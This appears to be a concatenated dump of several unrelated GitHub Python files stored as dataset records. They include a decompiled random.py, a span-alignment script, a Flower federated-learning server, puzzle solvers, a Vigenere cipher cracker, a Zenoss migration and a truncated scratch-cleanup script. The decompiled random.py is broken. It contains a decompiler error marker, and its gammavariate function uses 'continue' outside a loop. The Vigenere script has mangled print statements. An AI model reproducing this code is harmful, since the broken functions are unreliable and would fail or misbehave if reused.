For dicts, use list(d).')\n randbelow = self._randbelow\n n = len(population)\n if not 0 <= k <= n:\n raise ValueError('Sample larger than population')\n result = [None]*k\n setsize = 21\n if k > 5:\n setsize += 4**_ceil(_log(k*3, 4))\n if n <= setsize:\n pool = list(population)\n for i in range(k):\n j = randbelow(n - i)\n result[i] = pool[j]\n pool[j] = pool[n - i - 1]\n else:\n selected = set()\n selected_add = selected.add\n for i in range(k):\n j = randbelow(n)\n while j in selected:\n j = randbelow(n)\n selected_add(j)\n result[i] = population[j]\n return result\n\n def uniform(self, a, b):\n return a + (b - a)*self.random()\n\n def triangular(self, low=0.0, high=1.0, mode=None):\n u = self.random()\n c = 0.5 if mode is None else (mode - low)/(high - low)\n if u > c:\n u = 1.0 - u\n c = 1.0 - c\n (low, high) = (high, low)\n return low + (high - low)*(u*c)**0.5\n\n def normalvariate(self, mu, sigma):\n random = self.random\n while True:\n u1 = random()\n u2 = 1.0 - random()\n z = NV_MAGICCONST*(u1 - 0.5)/u2\n zz = z*z/4.0\n if zz <= -_log(u2):\n break\n return mu + z*sigma\n\n def lognormvariate(self, mu, sigma):\n return _exp(self.normalvariate(mu, sigma))\n\n def expovariate(self, lambd):\n return -_log(1.0 - self.random())/lambd\n\n def vonmisesvariate(self, mu, kappa):\n random = self.random\n if kappa <= 1e-06:\n return TWOPI*random()\n s = 0.5/kappa\n r = s + _sqrt(1.0 + s*s)\n while True:\n u1 = random()\n z = _cos(_pi*u1)\n d = z/(r + z)\n u2 = random()\n if u2 < 1.0 - d*d or u2 <= (1.0 - d)*_exp(d):\n break\n q = 1.0/r\n f = (q + z)/(1.0 + q*z)\n u3 = random()\n if u3 > 0.5:\n theta = (mu + _acos(f)) % TWOPI\n else:\n theta = (mu - _acos(f)) % TWOPI\n return theta\n\n def gammavariate(self, alpha, beta):\n if alpha <= 0.0 or beta <= 0.0:\n raise ValueError('gammavariate: alpha and beta must be > 0.0')\n random = self.random\n if alpha > 1.0:\n ainv = _sqrt(2.0*alpha - 1.0)\n bbb = alpha - LOG4\n ccc = alpha + ainv\n u1 = random()\n if not 1e-07 < u1 < 0.9999999:\n continue\n u2 = 1.0 - random()\n v = _log(u1/(1.0 - u1))/ainv\n x = alpha*_exp(v)\n z = u1*u1*u2\n r = bbb + ccc*v - x\n #ERROR: Unexpected statement: 517 BINARY_MULTIPLY | 518 RETURN_VALUE \n\n if r + SG_MAGICCONST - 4.5*z >= 0.0 or r >= _log(z):\n return x*beta\n continue\n else:\n if alpha == 1.0:\n u = random()\n while u <= 1e-07:\n u = random()\n return -_log(u)*beta\n while True:\n u = random()\n b = (_e + alpha)/_e\n p = b*u\n if p <= 1.0:\n x = p**(1.0/alpha)\n else:\n x = -_log((b - p)/alpha)\n u1 = random()\n if p > 1.0:\n if u1 <= x**(alpha - 1.0):\n break\n continue\n if u1 <= _exp(-x):\n break\n elif u1 <= _exp(-x):\n break\n return x*beta\n\n def gauss(self, mu, sigma):\n random = self.random\n z = self.gauss_next\n self.gauss_next = None\n if z is None:\n x2pi = random()*TWOPI\n g2rad = _sqrt(-2.0*_log(1.0 - random()))\n z = _cos(x2pi)*g2rad\n self.gauss_next = _sin(x2pi)*g2rad\n return mu + z*sigma\n\n def betavariate(self, alpha, beta):\n y = self.gammavariate(alpha, 1.0)\n if y == 0:\n return 0.0\n return y/(y + self.gammavariate(beta, 1.0))\n\n def paretovariate(self, alpha):\n u = 1.0 - self.random()\n return 1.0/u**(1.0/alpha)\n\n def weibullvariate(self, alpha, beta):\n u = 1.0 - self.random()\n return alpha*(-_log(u))**(1.0/beta)\n\nclass SystemRandom(Random):\n __qualname__ = 'SystemRandom'\n\n def random(self):\n return (int.from_bytes(_urandom(7), 'big') >> 3)*RECIP_BPF\n\n def getrandbits(self, k):\n if k <= 0:\n raise ValueError('number of bits must be greater than zero')\n if k != 
int(k):\n raise TypeError('number of bits should be an integer')\n numbytes = (k + 7)//8\n x = int.from_bytes(_urandom(numbytes), 'big')\n return x >> numbytes*8 - k\n\n def seed(self, *args, **kwds):\n pass\n\n def _notimplemented(self, *args, **kwds):\n raise NotImplementedError('System entropy source does not have state.')\n\n getstate = setstate = _notimplemented\n\ndef _test_generator(n, func, args):\n import time\n print(n, 'times', func.__name__)\n total = 0.0\n sqsum = 0.0\n smallest = 10000000000.0\n largest = -10000000000.0\n t0 = time.time()\n for i in range(n):\n x = func(*args)\n total += x\n sqsum = sqsum + x*x\n smallest = min(x, smallest)\n largest = max(x, largest)\n t1 = time.time()\n print(round(t1 - t0, 3), 'sec,', end=' ')\n avg = total/n\n stddev = _sqrt(sqsum/n - avg*avg)\n print('avg %g, stddev %g, min %g, max %g' % (avg, stddev, smallest, largest))\n\ndef _test(N=2000):\n _test_generator(N, random, ())\n _test_generator(N, normalvariate, (0.0, 1.0))\n _test_generator(N, lognormvariate, (0.0, 1.0))\n _test_generator(N, vonmisesvariate, (0.0, 1.0))\n _test_generator(N, gammavariate, (0.01, 1.0))\n _test_generator(N, gammavariate, (0.1, 1.0))\n _test_generator(N, gammavariate, (0.1, 2.0))\n _test_generator(N, gammavariate, (0.5, 1.0))\n _test_generator(N, gammavariate, (0.9, 1.0))\n _test_generator(N, gammavariate, (1.0, 1.0))\n _test_generator(N, gammavariate, (2.0, 1.0))\n _test_generator(N, gammavariate, (20.0, 1.0))\n _test_generator(N, gammavariate, (200.0, 1.0))\n _test_generator(N, gauss, (0.0, 1.0))\n _test_generator(N, betavariate, (3.0, 3.0))\n _test_generator(N, triangular, (0.0, 1.0, 0.3333333333333333))\n\n_inst = Random()\nseed = _inst.seed\nrandom = _inst.random\nuniform = _inst.uniform\ntriangular = _inst.triangular\nrandint = _inst.randint\nchoice = _inst.choice\nrandrange = _inst.randrange\nsample = _inst.sample\nshuffle = _inst.shuffle\nnormalvariate = _inst.normalvariate\nlognormvariate = _inst.lognormvariate\nexpovariate = _inst.expovariate\nvonmisesvariate = _inst.vonmisesvariate\ngammavariate = _inst.gammavariate\ngauss = _inst.gauss\nbetavariate = _inst.betavariate\nparetovariate = _inst.paretovariate\nweibullvariate = _inst.weibullvariate\ngetstate = _inst.getstate\nsetstate = _inst.setstate\ngetrandbits = _inst.getrandbits\nif __name__ == '__main__':\n _test()\n","repo_name":"johndpope/sims4-ai-engine","sub_path":"base/lib/random.py","file_name":"random.py","file_ext":"py","file_size_in_byte":12657,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"34740030866","text":"from utils import *\r\nfrom tqdm import tqdm\r\nJACCARD_THR = 0.35\r\n\r\n\r\ndef span2indice(span, SentCharIdx):\r\n indice = []\r\n sub_spans = span.split(';')\r\n for sub_span in sub_spans:\r\n lims = [int(elem) - SentCharIdx for elem in sub_span.split(',')]\r\n indice += list(range(lims[0], lims[1]))\r\n return set(indice)\r\n\r\n\r\ndef calc_jaccard(row1, row2, isDoc):\r\n span1 = row1[\"docSpanOffsets\"] if isDoc else row1[\"summarySpanOffsets\"]\r\n span2 = row2[\"docSpanOffsets\"] if isDoc else row2[\"summarySpanOffsets\"]\r\n SentCharIdx1 = row1[\"docSentCharIdx\"] if isDoc else row1[\"scuSentCharIdx\"]\r\n SentCharIdx2 = row2[\"docSentCharIdx\"] if isDoc else row2[\"scuSentCharIdx\"]\r\n\r\n indice1 = span2indice(span1, SentCharIdx1)\r\n indice2 = span2indice(span2, SentCharIdx2)\r\n\r\n union_list = list(set.union(indice1,indice2))\r\n intersection_list = list(set.intersection(indice1,indice2))\r\n return 
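# --- Editorial note and sketch (not a dataset record) ------------------------
# In the decompiled random.py record above, gammavariate() is mangled: the
# alpha > 1.0 branch has a bare `continue` outside any loop, a dangling
# return, and an "#ERROR: Unexpected statement" marker. In upstream CPython
# the same body sits inside a rejection-sampling loop (Cheng's algorithm).
# The reconstruction below matches the CPython stdlib structure as best I
# recall it; verify against the real random.py before relying on it.
from math import exp, log, sqrt
import random as _rnd

LOG4 = log(4.0)
SG_MAGICCONST = 1.0 + log(4.5)

def gammavariate_alpha_gt_1(alpha, beta, random=_rnd.random):
    ainv = sqrt(2.0 * alpha - 1.0)
    bbb = alpha - LOG4
    ccc = alpha + ainv
    while True:
        u1 = random()
        if not 1e-7 < u1 < 0.9999999:
            continue                      # reject degenerate u1
        u2 = 1.0 - random()
        v = log(u1 / (1.0 - u1)) / ainv
        x = alpha * exp(v)
        z = u1 * u1 * u2
        r = bbb + ccc * v - x
        if r + SG_MAGICCONST - 4.5 * z >= 0.0 or r >= log(z):
            return x * beta               # accept the sample

assert gammavariate_alpha_gt_1(2.0, 1.0) > 0.0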
float(len(intersection_list)) / float(len(union_list))\r\n\r\ndef get_final_df_row(QASem_row, pyramid_row, doc_jaccard, summary_jaccard):\r\n new_row = {\"database\": pyramid_row[\"database\"],\r\n \"topic\": pyramid_row[\"topic\"],\r\n \"scuSentCharIdx\": pyramid_row[\"scuSentCharIdx\"],\r\n \"scuSentence\": pyramid_row[\"scuSentence\"],\r\n \"documentFile\": pyramid_row[\"documentFile\"],\r\n \"docSentCharIdx\": pyramid_row[\"docSentCharIdx\"],\r\n \"docSentText\": pyramid_row[\"docSentText\"],\r\n \"docSpanOieOffsets\": QASem_row[\"docSpanOffsets\"],\r\n \"docSpanOffsets\": pyramid_row[\"docSpanOffsets\"],\r\n \"docSpanOieText\": QASem_row[\"docSpanText\"],\r\n \"docSpanText\": pyramid_row[\"docSpanText\"],\r\n \"summarySpanOieOffsets\": QASem_row[\"summarySpanOffsets\"],\r\n \"summarySpanOffsets\": pyramid_row[\"summarySpanOffsets\"],\r\n \"summarySpanOieText\": QASem_row[\"summarySpanText\"],\r\n \"summarySpanText\": pyramid_row[\"summarySpanText\"],\r\n \"docSpanJaccard\": str(doc_jaccard),\r\n \"summarySpanJaccard\": str(summary_jaccard)}\r\n return new_row\r\n\r\n\r\n\r\ndef get_alignments_df(all_QASem_spans_df, aligned_pyramid_spans):\r\n final_df = pd.DataFrame(\r\n columns=[\"database\", \"topic\", \"scuSentCharIdx\", \"scuSentence\", \"documentFile\", \"docSentCharIdx\", \"docSentText\", \"docSpanOieOffsets\",\r\n \"docSpanOffsets\", \"docSpanOieText\", \"docSpanText\", \"summarySpanOieOffsets\", \"summarySpanOffsets\", \"summarySpanOieText\",\r\n \"summarySpanText\", \"docSpanJaccard\", \"summarySpanJaccard\", \"scuLabel\"])\r\n\r\n pbar = tqdm(total=all_QASem_spans_df.shape[0], unit=\"QASem span pairs\")\r\n for i, row in all_QASem_spans_df.iterrows():\r\n curr_aligned_pyramid_spans = aligned_pyramid_spans.loc[(aligned_pyramid_spans[\"topic\"] == row[\"topic\"]) &\r\n (aligned_pyramid_spans[\"documentFile\"] == row[\"documentFile\"]) &\r\n (aligned_pyramid_spans[\"scuSentCharIdx\"] == row[\"scuSentCharIdx\"]) &\r\n (aligned_pyramid_spans[\"docSentCharIdx\"] == row[\"docSentCharIdx\"])]\r\n if curr_aligned_pyramid_spans.shape[0]>0: # not an empty df\r\n for j, p_row in curr_aligned_pyramid_spans.iterrows():\r\n doc_span_jaccard = calc_jaccard(row, p_row, True)\r\n summary_span_jaccard = calc_jaccard(row, p_row, False)\r\n if doc_span_jaccard > JACCARD_THR and summary_span_jaccard > JACCARD_THR:\r\n final_df = final_df.append(get_final_df_row(row, p_row, doc_span_jaccard, summary_span_jaccard), ignore_index=True) # AVIVSL: change ignore_index to False?\r\n pbar.update(1)\r\n pbar.close()\r\n final_df = final_df.drop_duplicates(subset=[\"database\", \"topic\", \"scuSentCharIdx\",\r\n \"scuSentence\", \"documentFile\", \"docSentCharIdx\",\r\n \"docSentText\", \"docSpanOieOffsets\", \"docSpanOieText\",\r\n \"summarySpanOieOffsets\", \"summarySpanOieText\"]) # remove QASem spans duplicates\r\n return final_df\r\n\r\ndef main(args):\r\n indir = args.indir\r\n outdir = args.outdir\r\n\r\n aligned_pyramid_spans = pd.read_csv(indir)\r\n aligned_pyramid_spans = aligned_pyramid_spans.drop_duplicates(subset=[\"database\", \"topic\", \"scuSentCharIdx\",\r\n \"scuSentence\", \"documentFile\", \"docSentCharIdx\",\r\n \"docSentText\", \"docSpanOffsets\", \"docSpanText\",\r\n \"summarySpanOffsets\", \"summarySpanText\"]) # remove pyramid spans duplicates (caused by intersections of the spans with more than one set of doc-summary oie spans)\r\n\r\n databases = list(set(aligned_pyramid_spans.database))\r\n for db in databases:\r\n all_QASem_spans_file = os.path.join(os.path.dirname(indir), 
HELPER_DIR_NAME, f\"all_span_combinations_{db}.csv\")\r\n all_QASem_spans_df = pd.read_csv(all_QASem_spans_file)\r\n\r\n print(f\"start {db}\")\r\n final_df = get_alignments_df(all_QASem_spans_df, aligned_pyramid_spans)\r\n\r\n curr_outdir = os.path.join(outdir, f\"QAsem_aligned_spans_{db}.csv\")\r\n final_df.to_csv(curr_outdir, index=True)\r\n print(f\"done {db}\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n argparser = argparse.ArgumentParser(description=\"\")\r\n argparser.add_argument(\"-i\", \"--indir\", required=True, help=\"path to train_full_details_with_oies_no_duplications.csv\")\r\n argparser.add_argument(\"-o\", \"--outdir\", required=True, help=\"path to where to save the aligned spans\")\r\n main(argparser.parse_args())","repo_name":"lovodkin93/automatic_aligned_QASem_spans","sub_path":"retrain_superPal_preprocess/get_alignments.py","file_name":"get_alignments.py","file_ext":"py","file_size_in_byte":5878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7284040082","text":"from typing import Dict, Optional, Tuple\nfrom collections import OrderedDict\nimport argparse\nfrom torch.utils.data import DataLoader\n\nimport flwr as fl\nimport torch\n\nimport utils\n\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\n\n\ndef fit_config(server_round: int):\n \"\"\"Return training configuration dict for each round.\n\n Keep batch size fixed at 32, perform two rounds of training with one local epoch,\n increase to two local epochs afterwards.\n \"\"\"\n config = {\n \"batch_size\": 16,\n \"local_epochs\": 1 if server_round < 2 else 2,\n }\n return config\n\n\ndef evaluate_config(server_round: int):\n \"\"\"Return evaluation configuration dict for each round.\n\n Perform five local evaluation steps on each client (i.e., use five batches) during\n rounds one to three, then increase to ten local evaluation steps.\n \"\"\"\n val_steps = 5 if server_round < 4 else 10\n return {\"val_steps\": val_steps}\n\n\ndef get_evaluate_fn(model: torch.nn.Module, toy: bool):\n \"\"\"Return an evaluation function for server-side evaluation.\"\"\"\n\n # Load data and model here to avoid the overhead of doing it in `evaluate` itself\n trainset, _, _ = utils.load_data()\n\n n_train = len(trainset)\n if toy:\n # use only 10 samples as validation set\n valset = torch.utils.data.Subset(trainset, range(n_train - 10, n_train))\n else:\n # Use the last 5k training examples as a validation set\n valset = torch.utils.data.Subset(trainset, range(n_train - 5000, n_train))\n\n valLoader = DataLoader(valset, batch_size=16)\n\n # The `evaluate` function will be called after every round\n def evaluate(\n server_round: int,\n parameters: fl.common.NDArrays,\n config: Dict[str, fl.common.Scalar],\n ) -> Optional[Tuple[float, Dict[str, fl.common.Scalar]]]:\n # Update model with the latest parameters\n params_dict = zip(model.state_dict().keys(), parameters)\n state_dict = OrderedDict({k: torch.tensor(v) for k, v in params_dict})\n model.load_state_dict(state_dict, strict=True)\n\n loss, accuracy = utils.test(model, valLoader)\n return loss, {\"accuracy\": accuracy}\n\n return evaluate\n\n\ndef main():\n \"\"\"Load model for\n 1. server-side parameter initialization\n 2. 
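# --- Editorial sketch (not a dataset record) --------------------------------
# get_alignments.py above scores doc/summary span pairs by Jaccard overlap of
# their character indices, parsing spans like "12,20;30,35" relative to a
# sentence offset. The same parsing and scoring, self-contained (function
# names are mine):
def span_to_indices(span: str, sent_char_idx: int) -> set:
    indices = set()
    for sub in span.split(";"):
        start, end = (int(x) - sent_char_idx for x in sub.split(","))
        indices.update(range(start, end))
    return indices

def jaccard(span_a, span_b, off_a=0, off_b=0) -> float:
    a, b = span_to_indices(span_a, off_a), span_to_indices(span_b, off_b)
    return len(a & b) / len(a | b)

assert jaccard("0,10", "5,15") == 5 / 15  # overlap 5 chars, union 15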
server-side parameter evaluation\n \"\"\"\n\n # Parse command line argument `partition`\n parser = argparse.ArgumentParser(description=\"Flower\")\n parser.add_argument(\n \"--toy\",\n type=bool,\n default=False,\n required=False,\n help=\"Set to true to use only 10 datasamples for validation. \\\n Useful for testing purposes. Default: False\",\n )\n\n args = parser.parse_args()\n\n model = utils.load_efficientnet(classes=10)\n\n model_parameters = [val.cpu().numpy() for _, val in model.state_dict().items()]\n\n # Create strategy\n strategy = fl.server.strategy.FedAvg(\n fraction_fit=0.2,\n fraction_evaluate=0.2,\n min_fit_clients=2,\n min_evaluate_clients=2,\n min_available_clients=10,\n evaluate_fn=get_evaluate_fn(model, args.toy),\n on_fit_config_fn=fit_config,\n on_evaluate_config_fn=evaluate_config,\n initial_parameters=fl.common.ndarrays_to_parameters(model_parameters),\n )\n\n # Start Flower server for four rounds of federated learning\n fl.server.start_server(\n server_address=\"0.0.0.0:8080\",\n config=fl.server.ServerConfig(num_rounds=4),\n strategy=strategy,\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"adap/flower","sub_path":"examples/advanced-pytorch/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3529,"program_lang":"python","lang":"en","doc_type":"code","stars":3287,"dataset":"github-code","pt":"61"} +{"seq_id":"14556864024","text":"def checkio(game_result):\n def _check_candidates(candidates):\n for side in ['X', 'O']:\n if any([c for c in candidates if c == side*3]):\n return side\n \n result = _check_candidates(game_result)\n if result:\n return result\n\n columns = [''.join([row[col] for row in game_result]) for col in range(0, 3)]\n result = _check_candidates(columns)\n if result:\n return result\n \n diagonals = [''.join([game_result[r][c] for r, c in zip(range(0, 3), range(0, 3))]),\n ''.join(game_result[r][c] for r, c in zip(range(0, 3), range(2, -1, -1)))]\n result = _check_candidates(diagonals)\n if result:\n return result\n\n return 'D'\n\nif __name__ == '__main__':\n #These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert checkio([\n \"X.O\",\n \"XX.\",\n \"XOO\"]) == \"X\", \"Xs wins\"\n assert checkio([\n \"OO.\",\n \"XOX\",\n \"XOX\"]) == \"O\", \"Os wins\"\n assert checkio([\n \"OOX\",\n \"XXO\",\n \"OXX\"]) == \"D\", \"Draw\"\n assert checkio([\n \"O.X\",\n \"XX.\",\n \"XOO\"]) == \"X\", \"Xs wins again\"\n\n","repo_name":"artPlusPlus/checkio","sub_path":"x-o-referee.py","file_name":"x-o-referee.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18373696954","text":"\"\"\"I wrote a fully automated Vigenere Cipher cracker\nsubmitted 1 year ago by Ouro130Ros\nYou can find the python code at pastebin\nThis class allows you to encrypt, decrypt and crack the Vigenere cipher.\nTo Encrypt simply instantiate the class and call .Encrypt(plainText, key)\nTo Decrypt simply call .Decrypt(cipherText, key)\nTo Crack call .Crack(cipherText, pathToEnglishDictionaryFile, candidateCount, passPercentage)\nI used this for a dictionary but any in the same format will work.\nThe Candidate count is the number of passwords to test at each key length.\nThe passPercentage is the percentage of english words in the plaintext needed to consider the crack a success.\nI use a combination of Kasiki analysis to guess key lengths along with Turing's 'Bans' frequency analysis to find the most likely keys of a 
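# --- Editorial sketch (not a dataset record) --------------------------------
# The x-o-referee.py record above checks rows, columns, and diagonals in
# three separate passes. Collecting all eight winning lines up front allows a
# single membership test; same behaviour, verified against the record's own
# test boards:
def referee(board):
    lines = list(board)                                        # 3 rows
    lines += ["".join(r[c] for r in board) for c in range(3)]  # 3 columns
    lines += ["".join(board[i][i] for i in range(3)),          # main diagonal
              "".join(board[i][2 - i] for i in range(3))]      # anti-diagonal
    for side in "XO":
        if side * 3 in lines:
            return side
    return "D"

assert referee(["X.O", "XX.", "XOO"]) == "X"
assert referee(["OOX", "XXO", "OXX"]) == "D"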
given length. I hope you enjoy!\nP.S. sorry for the lazy code.\n\nhttps://www.reddit.com/r/codes/comments/3apt0l/i_wrote_a_fully_automated_vigenere_cipher_cracker/\n\"\"\"\n\nfrom math import log\nimport re\nimport os\n\n\nclass VCipher:\n def __init__(self):\n self.Alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n self.Frequencies = {\n 'A': 84, 'B': 23, 'C': 21, 'D': 46, 'E': 116, 'F': 20, 'G': 25, 'H': 49, 'I': 76,\n 'J': 2, 'K': 5, 'L': 38, 'M': 34, 'N': 66, 'O': 66, 'P': 15, 'Q': 2, 'R': 64,\n 'S': 73, 'T': 81, 'U': 19, 'V': 11, 'W': 21, 'X': 2, 'Y': 24, 'Z': 3\n }\n\n for k in self.Frequencies.keys():\n self.Frequencies[k] = self.Frequencies[k] / 1000.0\n\n self.Bans = {}\n for a in self.Alphabet:\n x = (25 * self.Frequencies[a]) / (1 - self.Frequencies[a])\n x = log(x) / log(10)\n self.Bans[ord(a) - ord('A')] = x\n\n def TuringCheck(self, cipherText, keyLength, resultCount):\n ByLetter = {}\n for a in self.Alphabet:\n ByLetter[a] = []\n ordVal = ord(a) - ord('A')\n for col in range(0, keyLength):\n i = col\n Evidence = 0\n while i < len(cipherText):\n cipherVal = ord(cipherText[i]) - ord('A')\n diff = (cipherVal - ordVal) % 26\n Evidence += self.Bans[diff]\n i += keyLength\n ByLetter[a].append(Evidence)\n Result = []\n for i in range(0, keyLength):\n Column = {}\n for l in self.Alphabet:\n Column[l] = ByLetter[l][i]\n Result.append(Column)\n return self._GetLikelyPasswords(Result, resultCount)\n\n def Encrypt(self, plainText, key):\n CipherText = ''\n KeyPos = 0\n for l in plainText:\n if l in self.Alphabet:\n lV = ord(l) - ord('A')\n kV = ord(key[KeyPos].upper()) - ord('A')\n val = (lV + kV) % 26\n CipherText += chr(val + ord('A'))\n KeyPos = (KeyPos + 1) % len(key)\n elif l.upper() in self.Alphabet:\n lV = ord(l) - ord('a')\n kV = ord(key[KeyPos].lower()) - ord('a')\n val = (lV + kV) % 26\n CipherText += chr(val + ord('a'))\n KeyPos = (KeyPos + 1) % len(key)\n else:\n CipherText += l\n return CipherText\n\n def Decrypt(self, cipherText, key):\n PlainText = ''\n KeyPos = 0\n for l in cipherText:\n if l in self.Alphabet:\n lV = ord(l) - ord('A')\n kV = ord(key[KeyPos].upper()) - ord('A')\n val = (lV - kV) % 26\n PlainText += chr(val + ord('A'))\n KeyPos = (KeyPos + 1) % len(key)\n elif l.upper() in self.Alphabet:\n lV = ord(l) - ord('a')\n kV = ord(key[KeyPos].lower()) - ord('a')\n val = (lV - kV) % 26\n PlainText += chr(val + ord('a'))\n KeyPos = (KeyPos + 1) % len(key)\n else:\n PlainText += l\n return PlainText\n\n def _Factor(self, n):\n return set(reduce(list.__add__, ([i, n // i] for i in range(1, int(n ** 0.5) + 1) if n % i == 0)))\n\n def _FindRepeatedSubstrings(self, cipherText, subLength):\n Subs = {}\n for i in range(0, len(cipherText) - subLength):\n Substring = cipherText[i:i + subLength]\n if cipherText.count(Substring) > 1 and not Substring in Subs.keys():\n Subs[Substring] = [m.start() for m in re.finditer(Substring, cipherText)]\n\n return Subs\n\n def _AddToCountDict(self, d, v):\n if not v in d.keys():\n d[v] = 1\n else:\n d[v] += 1\n\n def Crack(self, cipherText, pathToEnglishDict, candidateCount, passPercentage):\n print\n \"Cracking...\\n{0}\".format(cipherText)\n with open(pathToEnglishDict) as f:\n Dictionary = [x.strip('\\n') for x in f.readlines()]\n Trimmed = self.Trim(cipherText)\n KeyLengthsDict = self.GetLikelyKeyLengths(Trimmed)\n KeyLengths = sorted(KeyLengthsDict, key=KeyLengthsDict.__getitem__, reverse=True)\n print\n \"Found {0} candidate key lengths\".format(len(KeyLengths))\n for length in KeyLengths:\n print\n \"Testing Length: {0}\".format(length)\n 
Keys = self.TuringCheck(Trimmed, length, candidateCount)\n for key in Keys:\n print\n \" Testing Key: {0}\".format(key)\n PlainText = self.TrimWithSpaces(self.Decrypt(cipherText, key))\n Words = PlainText.split()\n EnglishWordCount = 0\n for word in Words:\n if word in Dictionary: EnglishWordCount += 1\n Percentage = float(EnglishWordCount) / len(Words)\n print\n \" Percentage of english words in sample: %{0}\".format(Percentage * 100)\n if Percentage >= (passPercentage / 100.0):\n print\n \"-------------\"\n print\n \"Cracked!\"\n print\n \"Key = {0}\".format(key)\n print\n self.Decrypt(cipherText, key)\n return\n print\n \"No key found... try other cyphers\"\n\n def GetLikelyKeyLengths(self, cyphertext):\n Substrings = self._FindRepeatedSubstrings(cyphertext, 3)\n Diffs = []\n for substring in Substrings.keys():\n for i in range(0, len(Substrings[substring]) - 1):\n Diffs.append(Substrings[substring][i + 1] - Substrings[substring][i])\n FactorCounts = {}\n\n for d in Diffs:\n Factors = self._Factor(d)\n for f in Factors:\n self._AddToCountDict(FactorCounts, f)\n return FactorCounts\n\n def _GetLikelyPasswords(self, columns, count):\n ColumnLetters = []\n Counts = []\n for ranks in columns:\n ColumnLetters.append(sorted(ranks, key=ranks.__getitem__, reverse=True))\n Counts.append(0)\n\n Results = []\n ResultCount = 0\n while ResultCount < count:\n BestPass = \"\"\n SmallestDiff = 1000\n SmallestCol = -1\n for i in range(0, len(columns)):\n BestPass += ColumnLetters[i][Counts[i]]\n if Counts[i] < 25:\n V1 = columns[i][ColumnLetters[i][Counts[i]]]\n V2 = columns[i][ColumnLetters[i][Counts[i] + 1]]\n Diff = V1 - V2\n if Diff < SmallestDiff:\n SmallestDiff = Diff\n SmallestCol = i\n Counts[SmallestCol] += 1\n Results.append(BestPass)\n ResultCount += 1\n return Results\n\n def TrimWithSpaces(self, text):\n result = ''\n for l in text:\n if l.upper() in self.Alphabet or l == ' ':\n result += l.upper()\n return result\n\n def Trim(self, text):\n result = ''\n for l in text:\n if l.upper() in self.Alphabet:\n result += l.upper()\n return result\n\n","repo_name":"wittrup/crap","sub_path":"crack/vigenere_reddit.py","file_name":"vigenere_reddit.py","file_ext":"py","file_size_in_byte":8159,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"17614592403","text":"import Migrate\n\nfrom Products.ZenModel.ZenossSecurity import *\n\nclass MoveHistoryToMoreMenu(Migrate.Step):\n version = Migrate.Version(2, 2, 0)\n \n def cutover(self, dmd):\n # Build menus\n dmd.buildMenus({\n 'More': [ { 'action': 'viewHistoryEvents',\n 'allowed_classes': ['EventClass', 'EventClassInst', \n 'Device', 'DeviceOrganizer', 'Location', 'System',\n 'DeviceClass'],\n 'banned_classes' : ['IpNetwork'],\n 'description': 'Event History',\n 'id': 'historyEvents',\n 'ordering': 1.0,\n 'permissions': (ZEN_VIEW,) } ]\n })\n viewHistory = dmd.zenMenus.More.zenMenuItems.viewHistory\n if not viewHistory.banned_classes:\n viewHistory.banned_classes = ('IpNetwork',)\n\n\nMoveHistoryToMoreMenu()\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/ZenModel/migrate/MoveHistoryToMoreMenu.py","file_name":"MoveHistoryToMoreMenu.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"23545130491","text":"def flipper_simulator(pancake, k):\n counter = 0\n for i in range(len(pancake) - k + 1):\n if pancake[i] == \"-\":\n for j in range(k):\n if pancake[i + j] == '+':\n pancake[i + j] = 
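# --- Editorial sketch (not a dataset record) --------------------------------
# The vigenere_reddit.py record above is Python 2 with paste-mangled print
# statements (each `print` split from its argument) and a bare `reduce`. The
# cipher it cracks is per-letter modular addition of the key; a minimal
# Python 3 round-trip, using the classic LEMON example as the test:
def vigenere(text: str, key: str, decrypt: bool = False) -> str:
    sign = -1 if decrypt else 1
    out, k = [], 0
    for ch in text:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            shift = ord(key[k % len(key)].upper()) - ord("A")
            out.append(chr((ord(ch) - base + sign * shift) % 26 + base))
            k += 1                    # key advances only on letters
        else:
            out.append(ch)
    return "".join(out)

ct = vigenere("ATTACK AT DAWN", "LEMON")
assert ct == "LXFOPV EF RNHR"
assert vigenere(ct, "LEMON", decrypt=True) == "ATTACK AT DAWN"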
'-'\n else:\n pancake[i + j] = '+'\n counter += 1\n for i in range(k):\n if pancake[len(pancake) - i - 1] == '-':\n return 'IMPOSSIBLE'\n return counter\n\nt = int(input())\nfor i in range(1, t + 1):\n pancakeList = []\n pancakes, k = input().split(\" \")\n for j in pancakes:\n pancakeList.append(j)\n k = int(k)\n print(\"Case #{}: {}\".format(i, flipper_simulator(pancakeList, k)))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/3002.py","file_name":"3002.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16797574714","text":"#!/usr/bin/python\n\nfrom optparse import OptionParser, SUPPRESS_HELP\nimport subprocess\nimport os\nimport sys\n\n\nbrokenHosts = [6, ]\nallowedHosts = [h for h in range(1, 20) if not h in brokenHosts]\n\n\nclass Error(Exception):\n\t\"\"\"is the base class of visible errors from this script.\"\"\"\n\tpass\n\n\nclass HostsError(Error):\n\t\"\"\"is raised when encountering unexpected nodes etc.\"\"\"\n\tpass\n\n\nclass ExecutionError(Error):\n\t\"\"\"is raised when trying to delete scratch files on non-knecht hosts.\"\"\"\n\tpass\n\ndef getUserScratchDirs():\n\tdirs = []\n\tdirs.append(os.path.join(\"/scratch\", os.getenv(\"USER\")))\n\tdirs.append(os.path.join(\"/lscratch\", os.getenv(\"USER\")))\n\tdirs.append(\"/scratch\")\n\tdirs.append(\"/lscratch\")\n\treturn 